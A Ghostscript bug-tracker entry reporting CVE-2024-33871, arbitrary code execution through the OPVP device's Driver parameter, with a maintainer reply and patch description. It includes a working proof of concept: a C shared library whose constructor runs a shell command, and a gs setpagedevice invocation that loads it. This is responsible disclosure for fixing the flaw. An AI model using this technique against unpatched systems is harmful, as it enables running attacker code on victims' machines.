| Summary: | OPVP device - Arbitrary code execution via custom Driver library | ||
|---|---|---|---|
| Product: | Ghostscript | Reporter: | zhutyra |
| Component: | Security (public) | Assignee: | Chris Liddell (chrisl) <chris.liddell> |
| Status: | RESOLVED FIXED | ||
| Severity: | normal | CC: | akhaitov, carnil, cbuissar, dr, jsmeix, ken.sharp, marc.deslauriers, rlescak, robin.watts, sam, till.kamppeter |
| Priority: | P2 | ||
| Version: | unspecified | ||
| Hardware: | PC | ||
| OS: | Linux | ||
| Customer: | Word Size: | --- | |
| Attachments: | patch | ||
Created attachment 25612 [details]
exploit
Exploit for x86_64 Linux.
```
$ gs -q -dNODISPLAY opvplib.ps
uid=1000(user) gid=1000(user) groups=1000(user)
```
The file contains a precompiled library. If it doesn't work for you or you don't want to run unknown code, you can also do it manually.
```
$ cat >lib.c <<"EOF"
#include <stdlib.h>
static void __attribute__ ((constructor)) init(void) {
exit(system("id"));
}
EOF
$ gcc -fPIC -shared -o /tmp/lib.so lib.c
$ gs -q -dNODISPLAY -c '<< /OutputDevice /opvp /Driver (/tmp/lib.so) >> setpagedevice'
uid=1000(user) gid=1000(user) groups=1000(user)
```
I've used the commit as supplied, thanks for that! We're just about to start the process of a patch release, I'll amend the status when the patch is available which will be in a week or two, unless something else comes up. I'm anticipating this might take us longer than usual because we will probably be applying for a CVE for this and other recent patches. It's become obvious that some distros have long term support versions of Ghostscript and they only apply patches with CVEs to those codebases. So we're more or less forced to get CVEs for any serious issues in order to ensure those versions get patched. We're keeping all the security patches private until the release, because we know someone has been mining our repository for security related patches and exploiting them. So I'm afraid that I can't point you to a commit in the repository for review :-( CVE-2024-33871 |
Created attachment 25611 [details] patch The "Driver" parameter for the "opvp"/"oprp" device specifies the name of a dynamic library and allows any library to be loaded. The patch does not allow changing this parameter after activating path control.